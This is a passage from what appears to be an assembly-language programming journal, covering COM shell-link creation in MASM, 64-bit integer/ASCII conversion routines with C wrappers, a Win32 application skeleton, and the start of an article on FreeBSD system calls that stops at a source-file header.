invoke GetModuleFileName, NULL, ADDR szBuffer1, MAX_PATH
invoke lstrcpy, ADDR szBuffer2, ADDR szBuffer1
; Find the last backslash '\' and end the string right after it
mov edx, OFFSET szBuffer2
mov ecx, edx
.REPEAT
mov al, BYTE PTR [edx]
.IF al == 92 ; "\"
mov ecx, edx
.ENDIF
inc edx
.UNTIL al == 0
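mov BYTE PTR [ecx+1], 0 ; keep only the directory part, with its backslash
; append (not copy) the link name so the link path stays absolute
invoke lstrcat, ADDR szBuffer2, ADDR szLinkName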
;----------------------------------------------
; here is where we call the proc with the COM methods
invoke CoInitialize, NULL
MakeMessage "Let's try our Createlink."
invoke CoCreateLink, ADDR szBuffer1, ADDR szBuffer2
MakeMessage "That's all folks !!!"
invoke CoUninitialize
invoke ExitProcess, NULL
;-----------------------------------------------------------------------
CoCreateLink PROC pszPathObj:DWORD, pszPathLink:DWORD
; CreateLink - uses the shell's IShellLink and IPersistFile interfaces
; to create and store a shortcut to the specified object.
; Returns the hresult of calling the member functions of the interfaces.
; pszPathObj - address of a buffer containing the path of the object.
; pszPathLink - address of a buffer containing the path where the
; shell link is to be stored.
; adapted from MSDN article "Shell Links"
; deleted useless "description" method
; added set icon location method
LOCAL pwsz :DWORD
LOCAL psl :DWORD
LOCAL ppsl :DWORD
LOCAL ppf :DWORD
LOCAL pppf :DWORD
LOCAL hResult :DWORD
LOCAL hHeap :DWORD
.data
CLSID_ShellLink GUID <0021401H, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IShellLink GUID <00214EEH, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IPersistFile GUID <000010BH, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
.code
; first, get some heap for a wide buffer
invoke GetProcessHeap
mov hHeap, eax
invoke HeapAlloc, hHeap, NULL, MAX_PATH * 2
mov pwsz, eax
; and set up some local pointers (we can't use ADDR on local vars)
lea eax, psl
mov ppsl, eax
lea eax, ppf
mov pppf, eax
; Get a pointer to the IShellLink interface.
invoke CoCreateInstance, ADDR CLSID_ShellLink, NULL, \
CLSCTX_INPROC_SERVER, ADDR IID_IShellLink, ppsl
mov hResult, eax
test eax, eax
.IF SUCEEDED
; Query IShellLink for the IPersistFile
; interface for saving the shortcut
coinvoke psl, IShellLink, QueryInterface, ADDR IID_IPersistFile, pppf
mov hResult, eax
test eax, eax
.IF SUCEEDED
; Set the path to the shortcut target
coinvoke psl, IShellLink, SetPath, pszPathObj
mov hResult, eax
; set the icon location
coinvoke psl, IShellLink, SetIconLocation, pszPathObj, 0
; use first icon found
mov hResult, eax
; change string to Unicode. (COM typically expects Unicode strings)
invoke MultiByteToWideChar, CP_ACP, 0, pszPathLink, -1, pwsz, MAX_PATH
; Save the link by calling IPersistFile::Save
coinvoke ppf, IPersistFile, Save, pwsz, TRUE
mov hResult, eax
; release the IPersistFile ppf pointer
; (Release returns a reference count, not an hResult, so it is not stored)
coinvoke ppf, IPersistFile, Release
.ENDIF
; release the IShellLink psl pointer
coinvoke psl, IShellLink, Release
.ENDIF
; free our heap space
invoke HeapFree, hHeap, NULL, pwsz
mov eax, hResult ; since we reuse this variable over and over,
; it contains the last method's result
ret
CoCreateLink ENDP
;-----------------------------------------------------------
end start
;-----------------------------------------------------------------------
Bibliography:
-------------
"Inside COM, Microsoft's Component Object Model" Dale Rogerson
Copyright 1997, Paperback - 376 pages CD-ROM edition
Microsoft Press; ISBN: 1572313498
(THE fundamental book on understanding how COM works on a fundamental level.
Uses C++ code to illustrate basic concepts as it builds simple fully
functional COM object)
"Automation Programmer's Reference : Using ActiveX Technology to Create
Programmable Applications" (no author listed)
Copyright 1997, Paperback - 450 pages
Microsoft Press; ISBN: 1572315849
(This book has been available online on MSDN in the past, but it is cheap
enough for those of you who prefer real books you can hold in your hand.
Defines the practical interfaces and functions that the automation libraries
provide you, but is more of a reference book than a "user's guide")
Microsoft Developers Network
http://msdn.microsoft.com
"Professional Visual C++ 5 ActiveX/Com Control Programming" Sing Li
and Panos Economopoulos
Copyright April 1997, Paperback - 500 pages (no CD, files available
online)
Wrox Press Inc; ISBN: 1861000375
(Excellent description of ActiveX control and control site interfaces.
A recent review of this book on Amazon.com stated "These guys are the
type that want to rewrite the world's entire software base in
assembler." Need I say more?)
"sean's inconsequential homepage"
http://www.eburg.com/~baxters/
Various hardcore articles on low-level COM and ATL techniques. Coded in C++
"Using COM in Assembly Language" Bill Tyler
Assembly Language Journal, Apr-June 99
Mr Tyler keeps a web site at:
http://thunder.prohosting.com/~asm1/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
64-bit Integer/ASCII Conversion
by X-Calibre
The following routines provide an assembly-language library for converting
64-bit integers to and from ASCII, such as would be required when preparing
user-supplied data for qword arithmetic or FPU instructions. The library
consists of the routines ParseRadixSigned, ParseRadixUnsigned,
PrintRadixSigned, and PrintRadixUnsigned, and the macro Divide64. Wrappers
for calling the routines from C code have also been provided.
ParseRadix
----------
ParseRadix is a pair of routines for converting an ASCII string to a signed
or unsigned 64-bit integer, using a given radix as a base. The routines take
a pointer to a string and an integer radix as input, and return a 64-bit
number.
;-------------------------------------------------------------------------
ParseRadixUnsigned PROC
; Input: Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI
xor ebx, ebx
; result in EDX::EAX
xor eax, eax
xor edx, edx
mov al, [esi]
inc esi
test eax, eax
jz @@endOfParsing
sub eax, 30h
.IF eax > 9
sub eax, 7
.ENDIF
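mov bl, [esi]
; a one-character string is already fully parsed
test ebx, ebx
jz @@endOfParsing
@@smallParseLoop:
; ASCII to number conversion
sub ebx, 30h
inc esi
mul edi
.IF ebx > 9
sub ebx, 7
.ENDIF
add eax, ebx
; keep the high dword produced by MUL and add the carry from ADD
adc edx, 0
mov bl, [esi]
test ebx, ebx
jz @@endOfParsing
; stay in the 32-bit loop only while the result still fits in EAX
test edx, edx
jz @@smallParseLoop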
@@bigParseLoop:
; ASCII to number conversion
mov ecx, eax
mov eax, edx
sub ebx, 30h
inc esi
mul edi
xchg eax, ecx
mul edi
.IF ebx > 9
sub ebx, 7
.ENDIF
add eax, ebx
mov bl, [esi]
adc edx, ecx
test ebx, ebx
jnz @@bigParseLoop
@@endOfParsing:
ret
ParseRadixUnsigned ENDP
ParseRadixSigned PROC
; Input: Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI
.code
; If string does not start with a '-', consider it positive
cmp byte ptr [esi], '-'
jne ParseRadixUnsigned
; Number is negative, first parse the absolute value
inc esi
call ParseRadixUnsigned
; Now negate the absolute value to get the negative result
neg edx
neg eax
sbb edx, 0
ret
ParseRadixSigned ENDP
;-------------------------------------------------------------------------
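As a cross-check for the listing above, here is a rough C model of the same
digit-by-digit method. It is a sketch, not a translation: the names
parse_radix_unsigned and parse_radix_signed are made up here, and the result
is kept in two 32-bit halves only to mirror what the assembly does with
EDX::EAX. Like the assembly, it expects uppercase letters for digits above 9
and does not validate its input.

```c
#include <assert.h>
#include <stdint.h>

/* Parse a zero-terminated string in the given radix (hypothetical helper).
   Overflow wraps around modulo 2^64. */
static uint64_t parse_radix_unsigned(const char *s, uint32_t radix)
{
    uint32_t lo = 0, hi = 0;
    assert(radix >= 2 && radix <= 36);
    for (; *s != '\0'; ++s) {
        uint64_t low_prod;
        uint32_t digit = (uint32_t)(unsigned char)*s - '0';
        if (digit > 9)
            digit -= 7;                        /* 'A'..'Z' -> 10..35 */
        low_prod = (uint64_t)lo * radix + digit;   /* MUL, then ADD   */
        hi = hi * radix + (uint32_t)(low_prod >> 32); /* MUL, then ADC */
        lo = (uint32_t)low_prod;
    }
    return ((uint64_t)hi << 32) | lo;
}

/* A leading '-' means: parse the magnitude, then negate it. */
static int64_t parse_radix_signed(const char *s, uint32_t radix)
{
    if (*s != '-')
        return (int64_t)parse_radix_unsigned(s, radix);
    /* unsigned subtraction gives the two's-complement negation */
    return (int64_t)(0 - parse_radix_unsigned(s + 1, radix));
}
```

For example, parse_radix_unsigned("FF", 16) yields 255 and
parse_radix_signed("-42", 10) yields -42.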
The following is a wrapper used for calling the ParseRadix routines from C.
The wrapper provides the following C functions:
extern unsigned __int64 __stdcall
ParseRadixUnsignedC(char *lpBuffer, unsigned int radix);
extern signed __int64 __stdcall
ParseRadixSignedC(char *lpBuffer, unsigned int radix);
;-------------------------------------------------------------------------
.386
.Model Flat, StdCall
.code
include ParseRadix.asm
ParseRadixUnsignedC PROC lpBuffer:PTR BYTE, radix:DWORD
push esi
mov esi, [lpBuffer]
push edi
mov edi, [radix]
push ebx
call ParseRadixUnsigned
pop ebx
pop edi
pop esi
ret
ParseRadixUnsignedC ENDP
ParseRadixSignedC PROC lpBuffer:PTR BYTE, radix:DWORD
push esi
mov esi, [lpBuffer]
push edi
mov edi, [radix]
push ebx
call ParseRadixSigned
pop ebx
pop edi
pop esi
ret
ParseRadixSignedC ENDP
END
;-------------------------------------------------------------------------
Divide64
--------
Divide64 is a macro for dividing a 64-bit number by a 32-bit divisor using
32-bit integer instructions. Note that this is a 'long division' algorithm,
so it can easily be expanded to divide a number of any size by 32 bits. I
only use it for 64 bits here, to keep the CPU from raising a divide
exception when the quotient does not fit in 32 bits (that is, when the high
dword of the dividend is not smaller than the divisor), so that printing any
64-bit number with any radix is possible.
;-------------------------------------------------------------------------
Divide64 MACRO
; Input: 64 bit dividend in EBX::ECX, 32 bit divisor in ESI
; Output: 64 bit result in EBX::EAX, 32 bit remainder in EDX
; Uses: EAX, EBX, ECX, EDX, ESI
; Divide high dword by divisor.
mov eax, ebx
xor edx, edx
div esi
; The remainder left in EDX is the high dword for the second division.
mov ebx, eax
mov eax, ecx
div esi
ENDM
;-------------------------------------------------------------------------
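The two-step division in the macro can be modelled in C as follows. This is
a sketch under my own naming (Div64Result and divide64 do not appear in the
library); it shows why the second division can never overflow: its high
half is a remainder, which is always smaller than the divisor.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical result type: 64-bit quotient in two halves plus remainder. */
typedef struct {
    uint32_t quot_hi;
    uint32_t quot_lo;
    uint32_t rem;
} Div64Result;

static Div64Result divide64(uint32_t hi, uint32_t lo, uint32_t divisor)
{
    Div64Result r;
    uint64_t partial;
    assert(divisor != 0);
    /* Step 1: divide the high dword on its own. */
    r.quot_hi = hi / divisor;
    /* Step 2: the remainder becomes the high dword of the second dividend,
       exactly what DIV sees as EDX::EAX. */
    partial = ((uint64_t)(hi % divisor) << 32) | lo;
    r.quot_lo = (uint32_t)(partial / divisor);  /* always fits in 32 bits */
    r.rem = (uint32_t)(partial % divisor);
    return r;
}
```

Calling divide64(0, 100, 7) gives a quotient of 14 and a remainder of 2.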
PrintRadix
----------
PrintRadix is a pair of routines for converting signed and unsigned 64-bit
numbers to an ASCII string, using a given radix as base. These routines
take a 64-bit number, an integer radix, and a pointer to an output buffer as
input. They write the zero-terminated string to the buffer and return its
length.
;-------------------------------------------------------------------------
PrintRadixUnsigned PROC
; Input: 64 bit unsigned number in EBX::ECX, radix in ESI, pointer to
; output buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
; EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI, EBP
xor ebp, ebp ; StringLength counter
; If the high dword of the number is not smaller than the divisor, we
; have to do a 'long division' to prevent overflow.
cmp ebx, esi
jb smallDiv
longDiv:
Divide64
; Convert the remainder to an ASCII char.
add edx, 30h
dec esp
.IF edx > 39h
add edx, 7
.ENDIF
; Store char on stack.
inc ebp
; While result is not 0, we loop.
test eax, eax
mov ecx, eax
mov [esp], dl
jz lowDWORDIsZero
cmp ebx, esi
jae longDiv
smallDiv:
; Set EBX::ECX to EDX::EAX for a normal 64->32 division.
mov edx, ebx
mov eax, ecx
radixLoopSmall:
div esi
; Convert the remainder to an ASCII char.
add edx, 30h
dec esp
.IF edx > 39h
add edx, 7
.ENDIF
; Store char on stack.
inc ebp
mov [esp], dl
; Clean out high dword for next division.
xor edx, edx
; While result is not 0, we loop.
test eax, eax
jnz radixLoopSmall
toBuffer:
mov eax, ebp ; Return stringlength (not including 0-terminator)
toBufferLoop:
; Copy the string from stack to the destination buffer.
inc edi
mov dl, [esp]
inc esp
dec ebp
mov [edi-1], dl
jnz toBufferLoop
; Zero terminate the string.
mov byte ptr [edi], 0
ret
lowDWORDIsZero:
test ebx, ebx
jnz longDiv
; We have the final string, time to copy it to the destination buffer.
jmp toBuffer
PrintRadixUnsigned ENDP
PrintRadixSigned PROC
; Input: 64 bit signed number in EBX::ECX, radix in ESI, pointer to output
; buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
; EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI, EBP
; If number is non-negative, use the normal PrintRadix
test ebx, ebx
jns PrintRadixUnsigned
; Prefix the number with a - sign
mov byte ptr [edi], '-'
inc edi
; Negate the 64 bit number
neg ebx
neg ecx
sbb ebx, 0
; Do a normal PrintRadix
call PrintRadixUnsigned
inc eax
ret
PrintRadixSigned ENDP
;-------------------------------------------------------------------------
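The method used above (divide repeatedly by the radix, collect the
remainders as digits, then reverse them) can be sketched in C like this.
The function names are made up, a local array plays the role of the stack,
and a native 64-bit division is used where the assembly uses Divide64.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Write value in the given radix to out; return the string length, not
   counting the terminator. out needs room for up to 65 bytes. */
static size_t print_radix_unsigned(char *out, uint64_t value, uint32_t radix)
{
    char tmp[64];            /* 64 binary digits is the longest output */
    size_t n = 0, i;
    assert(radix >= 2 && radix <= 36);
    do {
        uint32_t digit = (uint32_t)(value % radix);
        value /= radix;
        /* digits come out least significant first */
        tmp[n++] = (char)(digit < 10 ? '0' + digit : 'A' + (digit - 10));
    } while (value != 0);
    for (i = 0; i < n; ++i)  /* reverse into the destination buffer */
        out[i] = tmp[n - 1 - i];
    out[n] = '\0';
    return n;
}

/* Negative numbers get a '-' prefix followed by their magnitude. */
static size_t print_radix_signed(char *out, int64_t value, uint32_t radix)
{
    if (value >= 0)
        return print_radix_unsigned(out, (uint64_t)value, radix);
    out[0] = '-';
    return 1 + print_radix_unsigned(out + 1, 0 - (uint64_t)value, radix);
}
```

With a 66-byte buffer, print_radix_unsigned(buf, 255, 16) stores "FF" and
returns 2, and print_radix_signed(buf, -42, 10) stores "-42" and returns 3.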
The following is a wrapper used for calling the PrintRadix routines from C.
The wrapper provides the following C functions:
extern unsigned int __stdcall
PrintRadixUnsignedC(char *lpBuffer, unsigned __int64 number,
unsigned int radix);
extern unsigned int __stdcall
PrintRadixSignedC(char *lpBuffer, signed __int64 number,
unsigned int radix);
;-------------------------------------------------------------------------
.386
.Model Flat, StdCall
.code
include PrintRadix.asm
PrintRadixUnsignedC PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
push ebp
mov ecx, dword ptr [number]
push ebx
mov ebx, dword ptr [number+sizeof DWORD]
push esi
mov esi, [radix]
push edi
mov edi, [lpBuffer]
call PrintRadixUnsigned
pop edi
pop esi
pop ebx
pop ebp
ret
PrintRadixUnsignedC ENDP
PrintRadixSignedC PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
push ebp
mov ecx, dword ptr [number]
push ebx
mov ebx, dword ptr [number+sizeof DWORD]
push esi
mov esi, [radix]
push edi
mov edi, [lpBuffer]
call PrintRadixSigned
pop edi
pop esi
pop ebx
pop ebp
ret
PrintRadixSignedC ENDP
END
;-------------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Win32 AppFatalExit Skeleton
by Chili
This is just a Win32 application skeleton with a small procedure that
manages fatal errors by displaying an information message box and
terminating the process.
I think the code is pretty much self-explanatory, and I commented it to some
degree, so there's not much to say. To close the black window just hit
ESCAPE.
The one thing that isn't quite right is that you have to code the line
numbers by hand, so if you change anything above previously coded numbers,
you'll have to do them again... oh well!
To assemble get the MASM32 package from: http://www.pbq.com.au/home/hutch/
--8<---------------------------------------------------------------------------
; SKELETON.ASM
; Win32 AppFatalExit Skeleton
; by Chili for APJ #8
; August 11, 2000
;##############################################################################
; Compiler Options
;##############################################################################
title Win32 AppFatalExit Skeleton
.386
.model flat, stdcall ; 32-bit memory model
option casemap :none ; case sensitive
;##############################################################################
; Includes
;##############################################################################
;// Include Files
include \masm32\include\windows.inc
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\comctl32.inc
include \masm32\include\comdlg32.inc
include \masm32\include\shell32.inc
;// Libraries
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\comctl32.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\shell32.lib
;##############################################################################
; Equates
;##############################################################################
;// Basic
NULL equ 0
FALSE equ 0
TRUE equ 1
;##############################################################################
; Local Prototypes
;##############################################################################
;// Main Program Procedures.
WinMain PROTO :DWORD, :DWORD, :DWORD, :DWORD
MainWndProc PROTO :DWORD, :DWORD, :DWORD, :DWORD
AppFatalExit PROTO :DWORD, :DWORD
;##############################################################################
; Local Macros
;##############################################################################
;// Return a value in EAX.
return MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
;// Memory-to-memory MOV.
m2m MACRO m1:REQ, m2:REQ
push m2
pop m1
ENDM
;// Memory copy.
mcopy MACRO destination:REQ, source:REQ
cld
lea esi, source
lea edi, destination
mov ecx, sizeof source
rep movsb
ENDM
;// Insert zero terminated string into code section.
szText MACRO name:REQ, text:VARARG
LOCAL lbl
jmp lbl
name db text, 0
lbl:
ENDM
;// Insert zero terminated string into .data section.
dszText MACRO name:REQ, text:VARARG
.data
name db text, 0
.code
ENDM
;// Return in EBX the ASCII size of a DWORD value
dwsize MACRO value:REQ
xor ebx, ebx
mov eax, value
.if eax == 0
inc ebx
.else
mov ecx, 10
.while eax > 0
xor edx, edx
div ecx
inc ebx
.endw
.endif
ENDM
;##############################################################################
; Initialized Data Section
;##############################################################################
.data
;##############################################################################
; Uninitialized Data Section
;##############################################################################
.data?
;##############################################################################
; Constants Section
;##############################################################################
.const
;##############################################################################
; Code Section
;##############################################################################
.code
;==============================================================================
; Beginning of executable code
;==============================================================================
start proc
;// Do some base initialization for the WinMain function and upon its
;// ending, terminate process.
LOCAL hModule :DWORD
;// Get handle to current instance.
invoke GetModuleHandle, NULL
.IF eax == NULL
dszText szGetModuleHandle_157, "GetModuleHandle, ln #157"
invoke AppFatalExit, addr szGetModuleHandle_157,
sizeof szGetModuleHandle_157
.ENDIF
mov hModule, eax
;// Get pointer to the command-line string for the current process.
invoke GetCommandLine
;// Call initial entry point for a Win32-based application.
invoke WinMain, hModule, NULL, eax, SW_SHOWMAXIMIZED
;// End process and all its threads.
invoke ExitProcess, eax
start endp
;==============================================================================
; WinMain Function (Called by the system as the initial entry point for a
; Win32-based application)
;==============================================================================
WinMain proc hInstance :DWORD, ;// handle to current instance
hPrevInstance :DWORD, ;// handle to previous instance
lpCmdLine :DWORD, ;// pointer to command line
nCmdShow :DWORD ;// show state of window
;// Perform initialization, create and display a main window and enter a
;// message retrieval-and-dispatch loop.
LOCAL wc :WNDCLASSEX
LOCAL hwndMain :DWORD
LOCAL msg :MSG
;// Register the window class for the main window.
mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_OWNDC
mov wc.lpfnWndProc, offset MainWndProc
mov wc.cbClsExtra, 0
mov wc.cbWndExtra, 0
m2m wc.hInstance, hInstance
invoke LoadIcon, NULL, IDI_APPLICATION
.if eax == NULL
dszText szLoadIcon_203, "LoadIcon, ln #203"
invoke AppFatalExit, addr szLoadIcon_203, sizeof szLoadIcon_203
.endif
mov wc.hIcon, eax
invoke LoadCursor, NULL, IDC_ARROW
.if eax == NULL
dszText szLoadCursor_209, "LoadCursor, ln #209"
invoke AppFatalExit, addr szLoadCursor_209, sizeof szLoadCursor_209
.endif
mov wc.hCursor, eax
invoke GetStockObject, BLACK_BRUSH
.if eax == NULL
dszText szGetStockObject_215, "GetStockObject, ln #215"
invoke AppFatalExit, addr szGetStockObject_215,
sizeof szGetStockObject_215
.endif
mov wc.hbrBackground, eax
mov wc.lpszMenuName, NULL
dszText szClassName, "MainWndClass"
mov wc.lpszClassName, offset szClassName
mov wc.hIconSm, NULL
invoke RegisterClassEx, addr wc
.if eax == 0
dszText szRegisterClassEx_227, "RegisterClassEx, ln #227"
invoke AppFatalExit, addr szRegisterClassEx_227,
sizeof szRegisterClassEx_227
.endif
;// Create the main window.
dszText szDisplayName, "Win32 AppFatalExit Skeleton"
invoke CreateWindowEx, NULL, addr szClassName, addr szDisplayName,
WS_POPUP or WS_CLIPSIBLINGS or WS_MAXIMIZE or \
WS_CLIPCHILDREN, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL,
hInstance, NULL
;// If the main window cannot be created, terminate the application.
.if eax == NULL
dszText szCreateWindowEx_237, "CreateWindowEx, ln #237"
invoke AppFatalExit, addr szCreateWindowEx_237,
sizeof szCreateWindowEx_237
.endif
mov hwndMain, eax
;// Show the window and paint its contents.
invoke ShowWindow, hwndMain, nCmdShow
invoke UpdateWindow, hwndMain
.if eax == NULL
dszText szUpdateWindow_255, "UpdateWindow, ln #255"
invoke AppFatalExit, addr szUpdateWindow_255,
sizeof szUpdateWindow_255
.endif
;// Start the message loop.
.while TRUE
invoke PeekMessage, addr msg, NULL, 0, 0, PM_REMOVE
.if (eax != 0)
.break .if msg.message == WM_QUIT
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg
.endif
.endw
;// Return the exit code to Windows.
return msg.wParam
WinMain endp
;==============================================================================
; WindowProc Function (Application-defined callback function that processes
; messages sent to a window)
;==============================================================================
MainWndProc proc hwnd :DWORD, ;// handle of window
uMsg :DWORD, ;// message identifier
wParam :DWORD, ;// first message parameter
lParam :DWORD ;// second message parameter
;// Dispatch the messages that can be received.
.if uMsg == WM_KEYDOWN
;// Process keyboard input by means of a key press.
.if wParam == VK_ESCAPE
;// Clean up window-specific data objects.
invoke PostQuitMessage, NULL
return 0
.endif
.elseif uMsg == WM_DESTROY
;// Clean up window-specific data objects.
invoke PostQuitMessage, NULL
return 0
.endif
;// Process other messages.
invoke DefWindowProc, hwnd, uMsg, wParam, lParam
ret
MainWndProc endp
;==============================================================================
; Application Fatal Exit Procedure
;==============================================================================
AppFatalExit proc lpszCaption :DWORD, ;// pointer to string to display in
\ ;// caption of the message box
nSize :DWORD ;// size of caption
;// Display a message box and terminate.
LOCAL uExitCode :DWORD
LOCAL lpBuffer :DWORD
LOCAL szFatalMessage [256]:BYTE
LOCAL nSizeMsg :DWORD
LOCAL szFatalCaption [64]:BYTE
;// Get the calling thread's last-error code value.
invoke GetLastError
mov uExitCode, eax
;// Obtain error message string.
invoke FormatMessage, FORMAT_MESSAGE_ALLOCATE_BUFFER or \
FORMAT_MESSAGE_FROM_SYSTEM, NULL, uExitCode, 0,
addr lpBuffer, 0, NULL
.if eax == NULL
dwsize uExitCode
mov nSizeMsg, ebx
invoke GetLastError
push eax
dwsize eax
add nSizeMsg, ebx
pop eax
dszText szDoubleFmt, "#%lu [& #%lu]"
invoke wsprintf, addr szFatalMessage, addr szDoubleFmt, uExitCode,
eax
add nSizeMsg, 7
.if eax != nSizeMsg
dszText szDoubleMessage, "#??? [& #???]"
mcopy szFatalMessage, szDoubleMessage
.endif
.else
mov nSizeMsg, eax
dwsize uExitCode
add nSizeMsg, ebx
dszText szFmt, "#%lu - %s"
invoke wsprintf, addr szFatalMessage, addr szFmt, uExitCode,
lpBuffer
add nSizeMsg, 4
.if eax != nSizeMsg
dszText szMessage, "#??? - ?????"
mcopy szFatalMessage, szMessage
.endif
invoke LocalFree, lpBuffer ;// Possible errors in LocalFree ignored
.endif
;// Display the application fatal exit message box.
dszText szCaptionFmt, "Fatal: %s"
invoke wsprintf, addr szFatalCaption, addr szCaptionFmt, lpszCaption
add nSize, 6
.if eax != nSize
dszText szCaption, "Fatal: ?????, ln #???"
mcopy szFatalCaption, szCaption
.endif
invoke MessageBox, NULL, addr szFatalMessage, addr szFatalCaption,
MB_ICONHAND or MB_SYSTEMMODAL
;// End process and all its threads.
invoke ExitProcess, uExitCode ;// exit with the saved last-error code
AppFatalExit endp
end start
---------------------------------------------------------------------------8<--
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
System Calls in FreeBSD
by G. Adam Stanislav
Assembly language programming under Unix is largely undocumented. It is
generally assumed that no one would ever want to use it because various Unix
systems run on different microprocessors, so everything should be written in
C for portability.
Now, we know that C portability is a myth. Even C programs need to be
modified when ported from one Unix to another, regardless of what processor
each runs on.
I was pleasantly surprised when one of the FreeBSD hackers recently posted an
assembly language 'Hello, World' program on the web. See
http://home.ptd.net/~tms2/hello.html for what he has to say.
There were two things I did not like in his example:
First of all, he uses the GNU assembler with its AT&T syntax. Talk about lack
of portability! Ever since I got involved in Unix programming, I switched
from MASM to NASM and never looked back. NASM allows me to use the same code
for Windows and Unix with only minor modifications needed wherever system
calls are necessary. Everything else remains the same. I also like the fact I
can use dots in the middle of a label.
Secondly, he uses a separate procedure for the system call. It looks like
this (in AT&T syntax):
do_syscall:
int $0x80 # Call kernel.
ret
He says a direct use of int 80h would not work. I refused to believe it. And
I was right. The "problem" he is solving by using a separate procedure is the
fact that int 80h is designed for use with C programs, which make calls to
functions like write() and read(). Because they make a call, an extra DWORD
(the return address) is pushed on the stack before int 80h is invoked.
His solution works, of course, but is unnecessary. All that is needed is
pushing an extra DWORD before invoking int 80h. The value pushed is
irrelevant. In my modification to his code, I simply pushed EAX and invoked
int 80h. Then I added an extra four bytes to ESP. I already had to increase
it anyway because int 80h uses the C calling convention of receiving
parameters on the stack and leaving them there. It worked without a hitch.
I learned from his code that the value in EAX determines which system call
int 80h makes. A list of these can be found in the C include file
<sys/syscall.h>.
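For readers who want to see those numbers at work before touching int 80h,
here is a minimal C sketch. It is not part of the original program: the
helper names raw_write and raw_getpid are made up for illustration, and it
assumes a libc that provides the syscall() wrapper (FreeBSD and glibc both
do). The first argument to syscall() is the same number that would go in EAX.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE      /* glibc: make unistd.h declare syscall() */
#endif
#include <assert.h>
#include <sys/syscall.h>     /* SYS_write, SYS_getpid, ... */
#include <sys/types.h>
#include <unistd.h>          /* syscall() */

/* Hypothetical helper: write len bytes from buf to fd, selecting the
 * system call by its number. Returns bytes written, or -1 on error. */
long raw_write(int fd, const void *buf, size_t len)
{
    assert(buf != NULL || len == 0);
    return (long)syscall(SYS_write, fd, buf, len);
}

/* Hypothetical helper: ask the kernel for our process ID the same way. */
long raw_getpid(void)
{
    return (long)syscall(SYS_getpid);
}
```

Calling raw_write(1, "hi\n", 3) should behave like write(1, "hi\n", 3); the
libc wrapper takes care of the stack layout that the assembly version has to
set up by hand.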
I then decided to experiment with his code a bit further, and create
something that actually does some work.
A typical Unix program is a filter which reads its input from stdin, writes
its output to stdout, and sends error messages to stderr. I decided to
produce such a filter for this article. Because I used tabs in my source code
and needed to convert them to spaces for this article, I made the filter
convert tabs to spaces. Because I started writing it under Windows and
finished it under Unix, I also made the filter strip any carriage returns.
It would be more useful if it could accept command line parameters, so you
could decide how many spaces a tab should expand to. Alas, I have no idea
where to find the command line under FreeBSD. If you know, please email me at
adam@.... For now, the program simply assumes a tab stop is at
every 8th position.
The program uses ESI as a counter of where on the line it is. To calculate
the number of blanks to insert, it moves ESI to EAX, negates EAX, ANDs it
with seven, and adds 1. This works very well. Suppose you are at the
beginning of the line, i.e., at the first position. So, you turn 1 into -1,
i.e., 0FFFFFFFFh. AND it with 7, and you get 7. Increase that, and you know
you need to write 8 spaces.
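The same arithmetic can be checked in a few lines of C. This is only a sketch
of the formula described above; the function name spaces_for_tab is invented
here, and "column" is the 1-based position the tab character itself occupies
(the value of ESI after it has been incremented).

```c
#include <assert.h>

/* Number of spaces that replace a tab sitting at the given 1-based column,
 * with tab stops every 8 columns: negate, AND with 7, add 1. */
unsigned spaces_for_tab(unsigned column)
{
    assert(column >= 1);
    return ((0u - column) & 7u) + 1u;
}
```

A tab in column 1 gives 8 spaces, a tab in column 2 gives 7, and a tab in
column 8 gives just 1, so the text that follows always starts at column 9,
17, 25, and so on.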
I also used EDI as the pointer to the read/write buffer. I could have just
pushed its offset (push dword buffer) every time, but pushing a register
produces less code and is probably faster.
I chose ESI and EDI to hold persistent values (i.e., values that need to
survive the system call) because Unix system software uses the C convention
of preserving these two registers (as well as EBX and EBP).
In my first version I started the program with a PUSHAD and ended it with a
POPAD. This is certainly needed in Windows programs: An assembly language
program will crash Windows if it returns to Windows with any of the four
aforementioned registers modified.
Then I thought that surely FreeBSD would not allow such a serious security
hole in the system. I removed the PUSHAD and the POPAD, and the program
worked without a hitch.
The result is below.
;---------------------------------------------------------------------------
; File: tab2sp.asm
;
; A sample assembly language program for FreeBSD.
; It converts tabs to spaces. Nothing new, expand
; already does that and with more options.
;
; But it illustrates reading from stdin, and writing
; to stdout and stderr in assembly language.
;
; 05-May-2000
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;
; http://www.whizkidtech.net/
; http://www.redprince.net/
;
; Assemble with nasm:
;
